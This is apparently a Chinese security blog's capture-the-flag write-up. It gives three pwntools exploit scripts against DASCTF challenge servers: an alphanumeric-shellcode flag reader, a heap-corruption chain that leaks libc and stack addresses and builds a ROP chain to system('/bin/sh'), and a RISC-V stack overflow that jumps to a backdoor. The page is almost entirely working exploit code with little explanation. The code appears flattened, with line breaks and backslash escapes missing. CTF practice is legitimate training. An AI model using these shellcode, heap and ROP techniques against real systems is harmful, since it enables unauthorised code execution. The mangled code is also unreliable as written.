from pwn import *#from LibcSearcher import *context(os='linux', arch='amd64', log_level='debug')#context.terminal = ['tmux','splitw','-h']filename = './shellcode'debug = 0ip = 'tcp.cloud.dasctf.com'port = 27552
if debug:    p = process(filename)else:    p  = remote(ip,port)
ru      = lambda a:     p.recvuntil(a)r       = lambda n:     p.recv(n)sla     = lambda a,b:   p.sendlineafter(a,b)sa      = lambda a,b:   p.sendafter(a,b)sl      = lambda a:     p.sendline(a)s       = lambda a:     p.send(a)l32     = lambda  :u32(p.recvuntil(b'xf7')[-4:].ljust(4,b'x00'))l64     = lambda  :u64(p.recvuntil(b'x7f')[-6:].ljust(8,b'x00'))uu32    = lambda  :u32(p.recv(4).ljust(4,b'x00'))uu64    = lambda  :u64(p.recv(6).ljust(8,b'x00'))int16   = lambda data   :int(data,16)lg      = lambda s, num :p.success('%s -> 0x%x' % (s, num))

def inter() : p.interactive()def debu(cmd=''):    gdb.attach(p,cmd)    pause()def get_addr():     return u64(p.recvuntil(b'x7f')[-6:].ljust(8, b'x00'))def get_sysbin(libc_base,libc):     return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/shx00'))def csu(rdi, rsi, rdx, rip, gadget) :   debug_shellcode+ p64(1) + p64(rip) + p64(rdi) + p64(rsi) + p64(rdx) + p64(gadget - 0x1a)
sa(b'[2] Input: (ye / no)n',b'x0fx05')ru(b'[5] ======== Input Your P0P Code ========n')#payload = b'U^S_SX'+b'S'*(0x11-6)payload = b'T^S_Sx58x5ax5ax5cx5ax52'.ljust(0x11,b'x52')#debu('b *$rebase(0x14f2)')s(payload)
shellcode = ''shellcode += shellcraft.open('./flag')shellcode += shellcraft.dup2('eax',2)shellcode += shellcraft.read(2,'rsp',0x50)shellcode += shellcraft.dup2(1,3)shellcode += shellcraft.write(3,'rsp',0x50)shellcode += shellcraft.exit(0)shellcode = asm(shellcode)s(b'a'*0x4a+shellcode)inter()

heap

#coding:utf-8import sysfrom pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./heap'#context.arch='amd64'while True :  # try :    elf=ELF(elfelf)    context.arch=elf.arch
    gdb_text='''      telescope $rebase(0x202040) 16      '''
    if len(sys.argv)==1 :      clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')      io=process(elfelf)      gdb_open=1      # io=process(['./'],env={'LD_PRELOAD':'./'})      clibc.srand(clibc.time(0))      libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')      # ld = ELF('/lib/x86_64-linux-gnu/ld.so.6')      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    else :      clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')      io=remote('tcp.cloud.dasctf.com',28834)      gdb_open=0      clibc.srand(clibc.time(0))      libc=ELF('./libc-3.35.so')      # ld = ELF('/lib/x86_64-linux-gnu/ld.so.6')      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    def gdb_attach(io,a):      if gdb_open==1 :        gdb.attach(io,a)
    def choice(a):      io.sendlineafter('Your chocie:nn',a)
    def add(b):      pay=str(1)+' '+b      choice(pay)      def edit(a,b):      pay=str(3)+' '+str(a)+':'+b      choice(pay)
    def show(a):      pay=str(2)+' '+str(a)      choice(pay)
    def delete(a):      pay=str(4)+' '+str(a)      choice(pay)
    for i in range(12):      add('a'*0x50)      edit(i,'a'*0x28+'x55')    sleep(3)    add('a'*0x63)    delete(0)    add('a'*0x62)    edit(12,'a'*0x63)    delete(12)    add('a'*0x58)    sleep(3)    show(12)    io.recvuntil('a'*0x63)    heap_base=u64('x00x00x00'+io.recv(3)+'x00x00')
    io.sendline('')    delete(2)    add('a'*0x62)    edit(0,'a'*0x60+'x6fx0d')    delete(0)    add('a'*0x58)    sleep(3)
    io.sendline('')    delete(6)    add('a'*0x62)    edit(2,'a'*0x60+'xf8x0c')    delete(2)    add('a'*0x58)    sleep(3)    io.sendline('')    edit(3,'a'*9+'x08')    sleep(3)    io.sendline('')
    edit(7,'x09')    sleep(3)    io.sendline('')    edit(3,'a'+p64(heap_base+0x111111))    sleep(3)    io.sendline('')
    edit(7,'x04')    sleep(3)    io.sendline('')    edit(3,'axa0x08')    sleep(3)    show(4)        libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['_IO_2_1_stdin_']    libc_base=libc_base&0xfffffffffffff000    libc.address=libc_base    bin_sh_addr=libc.search('/bin/shx00').next()    environ_addr=libc.sym['environ']    system_addr=libc.sym['system']    free_hook_addr=libc.sym['__free_hook']    pop_rax_ret=libc.search(asm('pop rax;ret')).next()    pop_rdi_ret=libc.search(asm('pop rdi;ret')).next()    pop_rsi_ret=libc.search(asm('pop rsi;ret')).next()    pop_rdx_ret=libc.search(asm('pop rdx;ret')).next()    syscall_ret=libc.search(asm('syscall;ret')).next()
    io.sendline('')    edit(7,'x07')    sleep(3)    edit(3,'a'+p64(environ_addr+1))    sleep(3)
    edit(7,'x02')    sleep(3)    edit(3,'a')    sleep(3)
    show(4)    stack_addr=u64(io.recvuntil('x7f')[-6:]+'x00x00')-0x120    io.sendline('')    edit(7,'x07')    sleep(3)    edit(3,'a'+p64(stack_addr))    sleep(3)    edit(4,p64(pop_rdi_ret+1))
    sleep(3)    edit(3,'a'+p64(stack_addr+8))    sleep(3)    edit(4,p64(pop_rdi_ret))
    sleep(3)    edit(3,'a'+p64(stack_addr+0x10))    sleep(3)    edit(4,p64(bin_sh_addr))
    sleep(3)    edit(3,'a'+p64(stack_addr+0x18))    sleep(3)    edit(4,p64(system_addr))
        success('libc_base:'+hex(libc_base))    success('heap_base:'+hex(heap_base))    success('stack_addr:'+hex(stack_addr))
    gdb_attach(io,gdb_text)    io.interactive()
  # except Exception as e:  #   io.close()  #   continue  # else:  #   continue

risky_login

用ghidra 反编译 RISC-V架构，发现存在栈溢出和后门函数，直接跳转到后门函数执行命令。

from pwn import *#from LibcSearcher import *context(os='linux', arch='amd64', log_level='debug')#context.terminal = ['tmux','splitw','-h']filename = ''debug = 0ip = 'tcp.cloud.dasctf.com'port = 29069
if debug:    p = process(filename)else:    p  = remote(ip,port)
ru      = lambda a:     p.recvuntil(a)r       = lambda n:     p.recv(n)sla     = lambda a,b:   p.sendlineafter(a,b)sa      = lambda a,b:   p.sendafter(a,b)sl      = lambda a:     p.sendline(a)s       = lambda a:     p.send(a)l32     = lambda  :u32(p.recvuntil(b'xf7')[-4:].ljust(4,b'x00'))l64     = lambda  :u64(p.recvuntil(b'x7f')[-6:].ljust(8,b'x00'))uu32    = lambda  :u32(p.recv(4).ljust(4,b'x00'))uu64    = lambda  :u64(p.recv(6).ljust(8,b'x00'))int16   = lambda data   :int(data,16)lg      = lambda s, num :p.success('%s -> 0x%x' % (s, num))

def inter() : p.interactive()def debu(cmd=''):    gdb.attach(p,cmd)    pause()def get_addr():     return u64(p.recvuntil(b'x7f')[-6:].ljust(8, b'x00'))def get_sysbin(libc_base,libc):     return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/shx00'))def csu(rdi, rsi, rdx, rip, gadget) :     return p64(gadget) + p64(0) + p64(1) + p64(rip) + p64(rdi) + p64(rsi) + p64(rdx) + p64(gadget - 0x1a)
sla(b'Input ur name:',b'r0ach')payload = b'a'*0x100+p64(0x123456ee)sa(b'Input ur words',payload)sa(b'input what you want exec',b'cat f*')inter()

EDI安全

扫二维码｜关注我们

一个专注渗透实战经验分享的公众号

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

2023“羊城杯”网络安全大赛初赛-WriteUp By EDISEC

【WriteUP】VSEC 车联网安全 CTF 挑战赛（四）

通过angr另类求解一道CISCN题目

CTF中的RSA低位攻击：从理论到实战

流量分析 - 流量分析训练题

VNCTF-2025-赛后复现

ctfd - java靶场搭建

【CTF】UTCTF2025 wp

2024 CISCN x 长城杯初赛Reverse赛题vt Writeup——攻城攻心的混淆大师

2024 CISCN x 长城杯初赛逆向0解题-VT 解题全流程

Aliyun2025 题解：easy-cuda-rev PTX汇编+cuda加速

发表评论

在线咨询

微信